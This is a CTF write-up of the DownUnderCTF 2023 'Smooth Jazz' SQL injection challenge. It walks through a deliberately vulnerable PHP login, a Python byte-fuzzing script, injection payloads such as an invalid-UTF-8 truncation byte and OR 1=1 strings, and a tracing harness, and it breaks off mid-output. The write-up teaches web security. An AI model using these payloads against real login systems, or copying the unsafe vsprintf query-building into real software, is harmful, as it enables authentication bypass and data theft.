DownUnderCTF 2023 - Smooth Jazz (SQL Injection)

Every year I look forward to DownUnderCTF, a 2-day CTF put on by some of the nicest and brightest folks from around Australia. This was my third year participating, and IMO the crew once again outdid themselves.

I decided this year to do a writeup for Smooth Jazz, another devilishly difficult SQL injection challenge by hashkitten. It involves the threading of three separate needles, and some creative format string wrangling.

Greetz

Shout outs to my fellow TDG team members, to the event organisers and challenge authors, to the generous sponsors, and to hashkitten for taking the time to read an early draft of this post. You’re all legends ❤️

Smooth Jazz

SPOILER WARNING

The challenge repo contains hashkitten’s solution and explanation. Throughout this writeup I propose a few challenges, with optional hints, so that you can progress through the challenge yourself. You should consider avoiding the official solution, and avoid scrolling too quickly through this post, else you could ruin some opportunities to work through the fun parts on your own. You’ve been warned!

The challenge was presented thusly:

Difficulty: medium

Author: hashkitten

Category: web

Sit back, relax, and enjoy this mini SQL injection challenge with some smooth jazz.

Contestants were given a zip file containing some Docker and docker-compose goodies, index.php (the challenge code), and schema.sql (the database setup script).

schema.sql was quite straightforward:

CREATE DATABASE challenge;

USE challenge;

CREATE TABLE IF NOT EXISTS users (
  username TEXT NOT NULL,
  password TEXT NOT NULL
);

INSERT INTO users VALUES ('admin', SHA1(RANDOM_BYTES(32)));

CREATE USER 'challuser'@'%' IDENTIFIED BY 'challpass';
GRANT SELECT ON challenge.* TO 'challuser'@'%';

It creates a table of username and password values, inserts a user with the username “admin” and a password given by the SHA1 of 32 bytes of random data, and creates a low-privilege MySQL user that is able to query the table.

index.php, the heart of the challenge, was given as follows:

<?php
function mysql_fquery($mysqli, $query, $params) {
  return mysqli_query($mysqli, vsprintf($query, $params));
}

if (isset($_POST['username']) && isset($_POST['password'])) {
  $mysqli = mysqli_connect(getenv('DB_HOST'),
                           'challuser',
                           'challpass',
                           'challenge');
  $username = strtr($_POST['username'], ['"' => '\\"', '\\' => '\\\\']);
  $password = sha1($_POST['password']);

  $res = mysql_fquery($mysqli,
                      'SELECT * FROM users WHERE username = "%s"',
                      [$username]);
  if (!mysqli_fetch_assoc($res)) {
     $message = "Username not found.";
     goto fail;
  }
  $res = mysql_fquery($mysqli,
                      'SELECT * FROM users WHERE username = "'.$username.'" ' .
                          'AND password = "%s"',
                      [$password]);
  if (!mysqli_fetch_assoc($res)) {
     $message = "Invalid password.";
     goto fail;
  }
  $htmlsafe_username = htmlspecialchars($username, ENT_COMPAT | ENT_SUBSTITUTE);
  $greeting = $username === "admin" 
      ? "Hello $htmlsafe_username, the server time is %s and the flag is %s"
      : "Hello $htmlsafe_username, the server time is %s";

  $message = vsprintf($greeting, [date('Y-m-d H:i:s'), getenv('FLAG')]);
  
  fail:
}
?>

<!--- SNIP - boring HTML --->

There is a chunk of interesting PHP code, followed by a bunch of boring HTML that essentially gives a HTML form and emits $message as set by the PHP code.

Preparing the battlespace

Something I really dig about DownUnderCTF is that the challenge handouts almost always give you everything you need to run the challenge locally. Even if it’s one of those painful challenges where you have a webapp and a database and a headless robot clicking on all the links you send it in the hopes of triggering XSS, they give you a docker-compose.yml. With a simple docker-compose up, you too can have the whole show running on your local machine and can share in the pain of the infra team.

This is great for performance and inspectability while solving the challenges. You get to watch the backend errors whizz past in your terminal, you can attach a debugger, or you can debug the One True Way by adding a million print("got here") statements throughout the code. You can even modify the code to weaken or remove certain security controls, allowing you to attack the problem one part at a time.

And so if you’d like to follow along with this post I suggest you grab a copy of the challenge and get it spun up locally. If something in this post isn’t clear to you, consider adding in some print statements to the code and going through the steps yourself, letting the ground-truth PHP engine tell you what’s going on rather than trusting me. And if you have the opportunity to run a full challenge stack on your local machine during a future CTF, I suggest you take it, even if a few hours of sending different payloads could save you literally minutes of doing docker-compose up 😉

Input Mutation

The challenge starts off by taking a username and password from the POST parameters, and immediately mutates them:

  $username = strtr($_POST['username'],
                    ['"' => '\\"', '\\' => '\\\\']);
  $password = sha1($_POST['password']);

It uses strtr() to modify the username, placing a backslash before any double quote (") or backslash (\) character. By performing both of these modifications with one single call to strtr(), the challenge does a very good job of essentially killing our double quotes and backslashes, turning a double quote (") into an escaped double quote (\") and a backslash (\) into an escaped backslash (\\).

Examples:

aaabbb    -->  aaabbb
aaa"bbb   -->  aaa\"bbb
aaa\bbb   -->  aaa\\bbb

aaa\"bbb  -->  aaa\\\"bbb
                  │ │ 
                  │ └──── Escaped doublequote
                  └──── Escaped backslash

As for our password, it’s hashed using SHA1.
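
To make the mutation concrete, here is a rough Python sketch of the two transformations. The names escape_username and mutate_inputs are hypothetical and not part of the challenge, and the regex is only an approximation of PHP's array-form strtr(), which replaces in a single pass and never rescans its own output.

```python
import hashlib
import re

# Same replacement pairs as the challenge's strtr() call.
REPLACEMENTS = {'"': '\\"', '\\': '\\\\'}
PATTERN = re.compile('|'.join(re.escape(k) for k in REPLACEMENTS))


def escape_username(username):
    # One left-to-right pass: each match is replaced once, and the
    # replacement text is never scanned again.
    return PATTERN.sub(lambda m: REPLACEMENTS[m.group(0)], username)


def mutate_inputs(username, password):
    # Python's hexdigest() is a lowercase hex string, like PHP's sha1().
    hashed = hashlib.sha1(password.encode()).hexdigest()
    return escape_username(username), hashed


for sample in ['aaabbb', 'aaa"bbb', 'aaa\\bbb', 'aaa\\"bbb']:
    print(sample, '-->', escape_username(sample))
```

Running it should reproduce the four examples above, which is a handy sanity check before trusting the sketch for anything else.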

Importantly, we can note that the $_* arrays ($_GET, $_POST, $_REQUEST, and so on) are not used anywhere in the challenge aside from these lines.

And so we can know:

  • These are likely the only inputs we can give to the code (a quick read of it confirms this to be true); and
  • The only way our inputs are getting to the code is by going through this mutation process.

It should be noted, both strtr() and sha1() get really cranky when given arrays, meaning that tricks such as username[]=foo&username[]=bar probably won’t be of any use to us. This can be confirmed in a php -a shell, and trying to do so in a HTTP context will result (in this case) in a 500 Internal Server Error.

% sudo -g docker docker run --rm -ti php:8.1 -a
Interactive shell

php > # strtr() and sha1() are OK with string arguments

php > print_r(strtr("Hello, world!", "", ""));
Hello, world!

php > print_r(sha1("Hello, world!"));
943a702d06f34599aee1f8da8ef9f7296031d699

php > # neither are OK with array arguments

php > print_r(strtr(array("Hello", "world!"), "", ""));
Warning: Uncaught TypeError: strtr(): Argument #1 ($string) must be of type
string, array given in php shell code:1
Stack trace:
#0 php shell code(1): strtr(Array, '', '')
#1 {main}
  thrown in php shell code on line 1

php > print_r(sha1(array("Hello", "world!")));

Warning: Uncaught TypeError: sha1(): Argument #1 ($string) must be of type
string, array given in php shell code:1
Stack trace:
#0 php shell code(1): sha1(Array)
#1 {main}
  thrown in php shell code on line 1

Ruling out things like this early on can be helpful. It can narrow the options you need to consider as you move through the challenge. However, there’s a very fine line here. Prematurely ruling something out that could be made to work with a bit of effort might end up ruling you out of finding the solution!

The first SQL query

Our freshly mutated username is now on its way into a MySQL SQL query:

function mysql_fquery($mysqli, $query, $params) {
  return mysqli_query($mysqli, vsprintf($query, $params));
}

// [... SNIP ...]

$res = mysql_fquery($mysqli,
                    'SELECT * FROM users WHERE username = "%s"',
                    [$username]);
if (!mysqli_fetch_assoc($res)) {
    $message = "Username not found.";
    goto fail;
}

There are a few things going on here.

First of all, there is a utility function being defined (mysql_fquery()) that performs an SQL query after preparing the query (the wrong way) using vsprintf().

I really laboured the point last year that the only way to safely do an SQL query using dynamic data is to use query parameterization (OWASP guidance). I’ll try to not be so preachy this year.
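
For anyone who missed last year's sermon, here is a minimal sketch of the difference. It is not the challenge code: it assumes Python's built-in sqlite3 module as a stand-in for MySQL, applies no escaping at all (unlike the challenge), and the function names are made up for illustration.

```python
import sqlite3


def build_users_db():
    # In-memory stand-in for the challenge's users table.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('admin', 'not-the-real-hash')")
    return conn


def lookup_formatted(conn, username):
    # The wrong way: the input becomes part of the SQL text itself.
    query = "SELECT * FROM users WHERE username = '%s'" % username
    return conn.execute(query).fetchall()


def lookup_parameterised(conn, username):
    # The right way: the input travels separately from the SQL text.
    return conn.execute(
        "SELECT * FROM users WHERE username = ?", (username,)).fetchall()


conn = build_users_db()
payload = "nobody' OR 1=1 -- "
print(len(lookup_formatted(conn, payload)))      # rows matched by the injected query
print(len(lookup_parameterised(conn, payload)))  # rows matched when the payload is just data
```

With the formatted query the payload rewrites the WHERE clause; with the parameterised one it is only ever compared against the username column.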

Secondly, there is a use of this utility function to do SELECT * FROM users WHERE username = "%s" where vsprintf() will do the hard work of transforming %s into our mutated $username value. If this SQL query results in no rows being returned, an error message of “Username not found” is set, and we take the goto fail shortcut to the part where the dynamic PHP code ends and the boring HTML starts.

We’ll come back to vsprintf(), how it works, and how we’ll eventually need to make it not work. It’s not relevant for this part of the challenge. For now, it suffices to say that given a $username of “Hello, world!”, the SQL query that will be performed is:

SELECT *
FROM users
WHERE username = "Hello, world!"
--                \__________/
--                 └──── Interpolated by vsprintf()

Reviewing the MySQL database setup script, we can know that the only user has a username of “admin”:

CREATE TABLE IF NOT EXISTS users (
  username TEXT NOT NULL,
  password TEXT NOT NULL
);

INSERT INTO users VALUES ('admin', SHA1(RANDOM_BYTES(32)));

And so we can get past this first hurdle by POSTing a username of “admin”.

Giving a username of “not admin” gives us an error message of “Username not found”:

POST / HTTP/1.1
[... SNIP ...]

username=not+admin&password=

HTTP/1.1 200 OK
[... SNIP ...]

[... SNIP ...]
Username not found.
[... SNIP ...]

While a username of “admin” gives us an error message of “Invalid password”:

POST / HTTP/1.1
[... SNIP ...]

username=admin&password=

HTTP/1.1 200 OK
[... SNIP ...]

[... SNIP ...]
Invalid password.
[... SNIP ...]

The problem here is, if we need to give a username of “admin” to get past this username check, and the password input that we give is going to be hashed, we’re very restricted. We’re greatly limited in the inputs we can give and the flexibility with which we can control the logic of the challenge.

An opportunity to explore

STOP SCROLLING

If you haven’t solved the challenge yet, this is an opportunity to explore.

If you continue reading before you try it for yourself, you may spoil the challenge.

Scroll carefully!

Challenge: Can you gain some flexibility with our inputs? Something that frees us from the shackles of having to give the exact username of “admin” to get past the username check?

Hints (Hover to reveal):

  • Is there any way you can add some data before or after the “admin” string while still getting past the username check?
  • What about if you put some magic or special character after the string “admin”. Something that might cause the SQL query to ignore everything after it within the username string. You could then have whatever you want after this magic or special character, it’d get ignored by MySQL, and you could put all sorts of goodies there, right?
  • Can you think of a way to automate the hunt for this magic or special character? Some kind of fuzzing or brute force strategy?
  • What if you use a fuzzing tool like Burp Intruder. Have it send a username that starts with “admin”, then fuzz the next character, then have some junk like “foobar” right after. See if any of the fuzzed characters mysteriously causes the challenge to say “Invalid password” rather than “Username not found”, indicating we’ve gotten past the username check but with an extra little bit of text smuggled into the username. Good luck!

STOP SCROLLING

SPOILERS AHEAD

This is your last chance to stop scrolling!

Gaining some username flexibility

Playing around at this point led us to the first primitive that showed some promise, and ended up being vital to solving the challenge. We threw the following POST payload into Burp Intruder, and we set it to cycle the part labelled §xx§ through every hex value from 00 to FF.

POST / HTTP/1.1
[... SNIP ...]

username=admin%§xx§foobar&password=

In doing this, we found there to be many values that mysteriously gave us the “Invalid password” error message rather than the “Username not found” one.

This work can be recreated in Python as follows:

#!/usr/bin/env python3
import requests

s = requests.session()
interesting = []

for c in range(256):
    r = s.post("http://172.31.0.3/",
               data={
                 "username": b"admin" + bytes([c]) + b"foobar",
                 "password": ""
               })
    if "Invalid password" in r.text:
        interesting.append(c)

print([hex(c) for c in interesting])

% ./fuzz.py
['0x80', '0x81', '0x82', '0x83', '0x84', '0x85', '0x86', '0x87', '0x88',
'0x89', '0x8a', '0x8b', '0x8c', '0x8d', '0x8e', '0x8f', '0x90', '0x91',
'0x92', '0x93', '0x94', '0x95', '0x96', '0x97', '0x98', '0x99', '0x9a',
'0x9b', '0x9c', '0x9d', '0x9e', '0x9f', '0xa0', '0xa1', '0xa2', '0xa3',
'0xa4', '0xa5', '0xa6', '0xa7', '0xa8', '0xa9', '0xaa', '0xab', '0xac',
'0xad', '0xae', '0xaf', '0xb0', '0xb1', '0xb2', '0xb3', '0xb4', '0xb5',
'0xb6', '0xb7', '0xb8', '0xb9', '0xba', '0xbb', '0xbc', '0xbd', '0xbe',
'0xbf', '0xc0', '0xc1', '0xc2', '0xc3', '0xc4', '0xc5', '0xc6', '0xc7',
'0xc8', '0xc9', '0xca', '0xcb', '0xcc', '0xcd', '0xce', '0xcf', '0xd0',
'0xd1', '0xd2', '0xd3', '0xd4', '0xd5', '0xd6', '0xd7', '0xd8', '0xd9',
'0xda', '0xdb', '0xdc', '0xdd', '0xde', '0xdf', '0xe0', '0xe1', '0xe2',
'0xe3', '0xe4', '0xe5', '0xe6', '0xe7', '0xe8', '0xe9', '0xea', '0xeb',
'0xec', '0xed', '0xee', '0xef', '0xf0', '0xf1', '0xf2', '0xf3', '0xf4',
'0xf5', '0xf6', '0xf7', '0xf8', '0xf9', '0xfa', '0xfb', '0xfc', '0xfd',
'0xfe', '0xff']

At a glance, it looks like any character above and including \x80 triggers this behaviour. We can confirm this by adding the following to the end of our Python script:

print(all(c in interesting for c in range(0x80, 256)))

When we re-run the script:

% ./fuzz.py
[... SNIP ...]
True

We get confirmation that yes, it’s any character above and including \x80 that does the trick.

Really? MySQL truncates a string value given a byte value above 0x7F?

Yeah. And we’re not quite sure why.

First of all, we assume that MySQL seeks to understand string values as being UTF-8 encoded Unicode strings. A byte outside of the ASCII range (0x00-0x7F) is very liable to constitute an invalid UTF-8 sequence.

Regarding this, ChatGPT says:

Justin: I have a string as follows: `aaaa\x80bbbb`

The A's and B's are all ASCII characters (i.e. <= 0x7F)

Is it true that the presence of the `\x80` byte will always cause
there to be a UTF-8 error? Why?

ChatGPT: Yes, it's true. The `\x80` byte is outside of the ASCII range
(0x00-0x7F), and in UTF-8 it's a continuation byte. If it's not
following a valid start byte, it results in an invalid encoding error.

Justin: What do you mean a "valid start byte"?

ChatGPT: In UTF-8 encoding, a "valid start byte" refers to the first
byte in a multibyte character. Its value indicates the total number
of bytes that form the character. The `\x80` byte isn't a valid start
byte because its binary representation (10000000) does not fit UTF-8's
patterns for start bytes.

Justin: Could a byte <= 0x7F be a valid start byte?

ChatGPT: Yes, a byte <= 0x7F can be a valid start byte. These bytes
correspond to standard ASCII and are valid single-byte UTF-8 characters.

Justin: can you give an example of a sequence of characters containing
the value `\x80` preceded by a byte that is <= 0x7f which represents a
valid UTF-8 string?

ChatGPT: No, I can't. In valid UTF-8, a byte in the range \x80-\xBF must
always be a continuation byte, following a start byte that introduces a
multi-byte sequence. Since the bytes in the range 0x00-0x7F are not
valid start bytes for multi-byte sequences, a byte <= 0x7F cannot be
followed by `\x80`, forming a valid UTF-8 string.

Justin: But you said "Yes, a byte <= 0x7F can be a valid start byte"

ChatGPT: I apologize for any confusion. While it's true a byte <= 0x7F can
be a valid start byte, it's more accurate to say that these bytes are
single-byte UTF-8 characters. A multibyte UTF-8 character always starts
with a byte in the range 0xC2-0xF4, not 0x00-0x7F. Therefore, \x80 cannot
follow a byte <= 0x7F in valid UTF-8 encoding.

And so if ChatGPT can be trusted, using a value between and including \x80 and \xBF is a good choice for our spicy truncation byte. Per the UTF-8 spec, it is apparently always expected to be preceded by a start byte that introduces a multi-byte sequence, which the “n” in “admin” (and indeed all other ASCII characters) cannot be. We’ll stick with \x80.

If MySQL is trying to take our string as a UTF-8 encoded Unicode string, then it would be choking on this spicy byte.
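
We don't have to take ChatGPT's word for the UTF-8 part. The sketch below assumes that Python's strict UTF-8 decoder is a fair referee, and checks which single bytes make "admin" + byte + "foobar" invalid. It says nothing about what MySQL does internally; it only shows whether the fuzzing hits line up with invalid UTF-8. The helper name is_valid_utf8 is my own.

```python
def is_valid_utf8(data: bytes) -> bool:
    # Python's decoder is strict by default and rejects malformed sequences.
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return True


# Same shape as the fuzzing payload: "admin", one fuzzed byte, then "foobar".
invalid = [c for c in range(256)
           if not is_valid_utf8(b"admin" + bytes([c]) + b"foobar")]

# Does the set of invalid bytes match the set of fuzzing hits (0x80-0xFF)?
print(invalid == list(range(0x80, 256)))
```

Bytes 0xC2-0xF4 are legitimate start bytes, but here they are followed by the ASCII "f" rather than a continuation byte, so the decoder rejects them too.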

But then why is it ignoring all subsequent characters within the quoted string value?

I… Don’t know. I spoke to hashkitten about it, and we wondered if it might have something to do with how MySQL used to truncate strings on insertion if they contained an invalid UTF-8 sequence - see for example this thread on the orange website and this hilarious post to the MySQL bug tracker. But apparently this default silent truncation behaviour went away when MySQL started defaulting to strict sql_mode with version 5.7, which reached general availability in 2015.

I turned on the query logs for my MySQL container and confirmed that the queries are being logged in their full glory, with the \x80 spicy byte and the trailing “foobar” data. But a few cheeky queries against the database from the command line fail to exhibit the truncation behaviour:

% sudo -g docker docker run --rm -it --entrypoint=mysql mysql -h 172.31.0.2 \
    --password=dummy --execute=$'SELECT \'aaaa\x80bbbb\''
mysql: [Warning] Using a password on the command line interface can be insecure.
+-------------+
| aaaa�bbbb |
+-------------+
| aaaa�bbbb |
+-------------+

% sudo -g docker docker run --rm -it --entrypoint=mysql mysql -h 172.31.0.2 \
    --password=dummy --execute=$'SELECT 1337 WHERE \'aaaa\' = \'aaaa\''
mysql: [Warning] Using a password on the command line interface can be insecure.
+------+
| 1337 |
+------+
| 1337 |
+------+

% sudo -g docker docker run --rm -it --entrypoint=mysql mysql -h 172.31.0.2 \
    --password=dummy --execute=$'SELECT 1337 WHERE \'aaaa\' = \'aaaa\x80bbbb\''
mysql: [Warning] Using a password on the command line interface can be insecure.

And so like… Is this only an issue when querying from PHP somehow? I don’t know.

I don’t like leaving mysteries like this unexplained, but I also don’t have the patience right now to get to the bottom of what’s going on. And so let’s not look a gift horse in the mouth, and let’s take the primitive for what it is.

The second SQL query

We can get past the username check by giving the username “admin”. We can even follow it up with a character above or equal to 0x80 and then as much extra junk as we want.

The second hurdle we face is as follows:

function mysql_fquery($mysqli, $query, $params) {
  return mysqli_query($mysqli, vsprintf($query, $params));
}

// [... SNIP ...]
$res = mysql_fquery($mysqli,
                    'SELECT * FROM users WHERE username = "'.$username.'" ' .
                        'AND password = "%s"',
                    [$password]);
if (!mysqli_fetch_assoc($res)) {
    $message = "Invalid password.";
    goto fail;
}

i.e. We now have a password check.

This code does the following:

  1. Uses string concatenation to directly inject the mutated $username (with its double quotes and backslashes having been escaped) into the query SELECT * FROM users WHERE username = "$username" AND password = "%s"
  2. Uses vsprintf() to replace the %s token in the query with the SHA1 of the password given by us
  3. Queries the database, and if it returns no data, takes the goto fail shortcut to sadness
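
The first two steps can be sketched in Python as follows. This is an approximation under a couple of assumptions: Python's % operator is only a rough stand-in for PHP's vsprintf(), the function names are hypothetical, and step 3 (actually running the query) is left out.

```python
import hashlib


def escape_username(username):
    # Prefix every double quote and backslash with a backslash.
    return ''.join('\\' + ch if ch in '"\\' else ch for ch in username)


def build_password_query(raw_username, raw_password):
    username = escape_username(raw_username)
    password = hashlib.sha1(raw_password.encode()).hexdigest()

    # Step 1: the mutated username is concatenated straight into the string.
    fmt = ('SELECT * FROM users WHERE username = "' + username + '" '
           'AND password = "%s"')

    # Step 2: the %s token is swapped for the SHA1 of the password.
    return fmt % (password,)


print(build_password_query("admin", "password"))
print(build_password_query('admin" OR 1=1;-- -', "password"))
```

The second call shows the escaped quote staying inside the username string, which is the behaviour the traces below walk through by hand.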

Breaking the code down a bit and skipping straight to the username/password check, tracing it through gives the following journey for a username of “admin” and a password of “password”:

// [... SNIP ...]

// $_POST['username'] = "admin"
// $_POST['password'] = "password"

$username = strtr($_POST['username'], ['"' => '\\"', '\\' => '\\\\']);
$password = sha1($_POST['password']);

// $username = "admin"      (no change)
// $password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

// [... SNIP - username SQL query omitted...]

$query = 'SELECT * FROM users WHERE username = "'.$username.'" ' .
    'AND password = "%s"';

// After the direct injection of the username, we have:
// $query = 'SELECT * FROM users WHERE username = "admin" AND password = "%s"'

$res = mysql_fquery($mysqli, $query, [$password]);

// $query and its friend $password are sent into the
// mysql_fquery() utility function

function mysql_fquery($mysqli, $query, $params) {
    $query_prepared = vsprintf($query, $params);
    // i.e. vsprintf('SELECT * FROM users WHERE username = "admin" ' .
    //                   'AND password = "%s"',
    //                array("5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"))

    // $query_prepared = 'SELECT * FROM users WHERE username = "admin" ' .
    //     'AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"'
    return mysqli_query($mysqli, $query_prepared);
}

// At this point, $res is a mysqli_result
// (https://www.php.net/manual/en/class.mysqli-result.php)
// It's probably empty because the admin's password is probably not 'password'

if (!mysqli_fetch_assoc($res)) {
    // This branch will probably get taken, because
    // the admin's password is probably not 'password'
    $message = "Invalid password.";
    goto fail;
}

// Execution continues if the admin's password is 'password'

Contrast this to what would happen if we gave a traditional SQL injection username of admin\x80" OR 1=1;-- -

// [... SNIP ...]

// $_POST['username'] = 'admin%80" OR 1=1;-- -'
// $_POST['password'] = "password"

$username = strtr($_POST['username'], ['"' => '\\"', '\\' => '\\\\']);
$password = sha1($_POST['password']);

// $username = 'admin\x80\\" OR 1=1;-- -'
// (Note that our double quote in the username has been escaped)
// $password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

// [... SNIP - username SQL query omitted...]

$query = 'SELECT * FROM users WHERE username = "'.$username.'" ' .
    'AND password = "%s"';

// After the direct injection of the username, we have:
// $query = 'SELECT * FROM users ' .
//  'WHERE username = "admin\x80\\" OR 1=1;-- -" ' .
//  'AND password = "%s"'

$res = mysql_fquery($mysqli, $query, [$password]);

// $query and its friend $password are sent into the
// mysql_fquery() utility function

function mysql_fquery($mysqli, $query, $params) {
    $query_prepared = vsprintf($query, $params);
    // i.e. vsprintf('SELECT * FROM users ' .
    //                   'WHERE username = "admin\x80\\" OR 1=1;-- -" ' .
    //                   'AND password = "%s"',
    //                array("5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"))

    // $query_prepared = 'SELECT * FROM users ' .
    //    'WHERE username = "admin\x80\\" OR 1=1;-- -" ' .
    //    'AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"'
    return mysqli_query($mysqli, $query_prepared);
}

// At this point, $res is a mysqli_result
// (https://www.php.net/manual/en/class.mysqli-result.php)

if (!mysqli_fetch_assoc($res)) {
    // This branch will get taken if the admin's password is not 'password'
    $message = "Invalid password.";
    goto fail;
}

// Execution continues if the admin's password is 'password'

We end up in the exact same spot. The strtr() has done its job, preventing us from breaking out of the double-quoted username. Thus it seems we cannot do the traditional OR 1=1 trick to bypass the password check.

So what now?

Building a test harness

At this point in a CTF challenge, I like to be able to rapidly try different things and get feedback on what happens at various points throughout the data processing pipeline.

The way that I did this during the CTF was to break apart or wrap certain steps in the original code, and to sprinkle it with debug print statements. This had the effect of essentially dumping some debug logs straight into HTTP responses, and I could sit there with Burp Repeater and try different payloads to learn more about the internal interactions and mechanics of the data processing.

My very heat-of-the-moment CTF-quality modifications were as follows:

function my_vsprintf($a, $b) {
    print_r("vsprintf format string: " . $a . "\n");
    print_r("vsprintf format params: ");
    print_r($b);
    $res = vsprintf($a, $b);
    print_r("res: " . $res . "\n");
    print_r("---\n\n");
    return $res;
}

function mysql_fquery($mysqli, $query, $params) {
  $q = my_vsprintf($query, $params);
  print_r("SQL: " . $q . "\n");
  print_r("---\n\n");
  return mysqli_query($mysqli, $q);
}


if (isset($_POST['username']) && isset($_POST['password'])) {
  $mysqli = mysqli_connect('db', 'challuser', 'challpass', 'challenge');
  $username = strtr($_POST['username'], ['"' => '\\"', '\\' => '\\\\']);
  $password = sha1($_POST['password']);
  print_r("username: " . $username . "\n---\n\n");

  $res = mysql_fquery($mysqli,
                      'SELECT * FROM users WHERE username = "%s"',
                      [$username]);
  if (!mysqli_fetch_assoc($res)) {
     $message = "Username not found.";
     goto fail;
  }
  $res = mysql_fquery($mysqli,
                      'SELECT * FROM users WHERE username = "'.$username.'" ' .
                          'AND password = "%s"',
                      [$password]);
  if (!mysqli_fetch_assoc($res)) {
     $message = "Invalid password.";
     goto fail;
  }

Yes, it’s ugly, in a lot of ways. While I try to keep my working neat and logical while I thrash out a CTF challenge, sometimes when you’re making an omelette you just need to get egg everywhere.

But now, with the benefit of hindsight and the desire to be able to, you know, explain what’s going on, we can take the chance to build our own reproduction of the data processing pipeline as a command-line utility:

<?php
function my_vsprintf($format, $values) {
    // Perform vsprintf() on a given format string and values array
    // Show our work as we go
    print_r("[+] vsprintf()\n");
    print_r("format string: $format\n");
    // Use json_encode() to get the array in one neat line.
    // Tell it to be prepared for the invalid UTF8 sequence.
    print_r("values: " . 
                json_encode($values, JSON_INVALID_UTF8_SUBSTITUTE) .
                "\n");
    $res = vsprintf($format, $values);
    print_r("result: $res\n\n");
    return $res;
}

function mysql_fquery($query, $params) {
    // Construct the SQL query and pretend to execute it
    $prepared_query = my_vsprintf($query, $params);
    print_r("[+] Do SQL Query\n");
    print_r($prepared_query . "\n\n");
    // We don't need to do the query, we're just monitoring the data flow
    //return mysqli_query($mysqli, $q);
}

// Get the username, escape its double quotes and backslashes
$username = $argv[1];
$username = strtr($username, ['"' => '\\"', '\\' => '\\\\']);
print_r("username: $username\n");

// Get the password, SHA1 it
$password = $argv[2];
$password = sha1($password);
print_r("password: $password\n\n");

mysql_fquery('SELECT * FROM users WHERE username = "%s"', [$username]);

// Stop if the username doesn't match our criteria:
//  * 'admi'   == bad
//  * 'admin'  == good
//  * 'adminX' == good if and only if X is a character >= 0x80
if (strpos($username, "admin") !== 0) {
  die("bad username!\n");
}
if (strlen($username) > 5 && ord(substr($username, 5, 1)) < 0x80) {
  die("bad username!\n");
}
mysql_fquery('SELECT * FROM users WHERE username = "'.$username.'" ' .
                 'AND password = "%s"', [$password]);

Note that this harness doesn’t perform the actual SQL queries. It pretends to check the username in a way that the admin\x80foobar trick will bypass, but really what we’re interested in doing is eyeballing the SQL queries that it indicates the challenge code would be executing.
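
The pretend username check is small enough to restate on its own. Here it is as a Python sketch working on raw bytes; passes_pretend_check is a hypothetical name, and like the harness it only encodes what the fuzzing showed us, not how MySQL actually compares strings.

```python
def passes_pretend_check(username: bytes) -> bool:
    # Must start with the literal bytes "admin"...
    if not username.startswith(b"admin"):
        return False
    # ...and if anything follows, the very next byte must be >= 0x80.
    if len(username) > 5 and username[5] < 0x80:
        return False
    return True


for candidate in [b"admi", b"admin", b"adminX", b"admin\x80foobar"]:
    print(candidate, passes_pretend_check(candidate))
```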

Running this harness validates the accuracy of the analysis and manual traces we’ve done so far. Or perhaps it’s the analysis and manual traces that are validating the accuracy of the harness. That or they’re both equally incorrect…

We take care to run this with PHP 8.1, matching the version used in the challenge:

% sudo -g docker docker run --rm -it \
    -v $(pwd):/pwd --entrypoint=bash php:8.1
root@c97654bed495:/# cd /pwd
root@c97654bed495:/pwd#

The “bad username” case gives:

# php jazz-data-pipeline.php not-admin password
username: not-admin
password: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["not-admin"]
result: SELECT * FROM users WHERE username = "not-admin"

[+] Do SQL Query
SELECT * FROM users WHERE username = "not-admin"

bad username!

While the “good username” case (username = “admin”) gives:

# php jazz-data-pipeline.php admin password
username: admin
password: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin"]
result: SELECT * FROM users WHERE username = "admin"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin"

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "admin" AND password = "%s"
values: ["5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"]
result: SELECT * FROM users WHERE username = "admin"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

And the spicy username case (with the \x80 byte) gives:

# php jazz-data-pipeline.php $'admin\x80its free real estate' password
username: admin🔥its free real estate
password: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffdits free real estate"]
result: SELECT * FROM users WHERE username = "admin🔥its free real estate"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥its free real estate"

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥its free real estate"
    AND password = "%s"
values: ["5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"]
result: SELECT * FROM users
    WHERE username = "admin🔥its free real estate"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

[+] Do SQL Query
SELECT * FROM users
    WHERE username = "admin🔥its free real estate"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

Note: My terminal doesn’t print \x80 in a visible way, so I’ve replaced it with 🔥

And the spicy attempt at an SQL injection username gives:

# php jazz-data-pipeline.php $'admin\x80" OR 1=1;-- -' password
username: admin🔥\" OR 1=1;-- -
password: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd\\\" OR 1=1;-- -"]
result: SELECT * FROM users WHERE username = "admin🔥\" OR 1=1;-- -"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥\" OR 1=1;-- -"

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥\" OR 1=1;-- -"
    AND password = "%s"
values: ["5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"]
result: SELECT * FROM users
    WHERE username = "admin🔥\" OR 1=1;-- -"
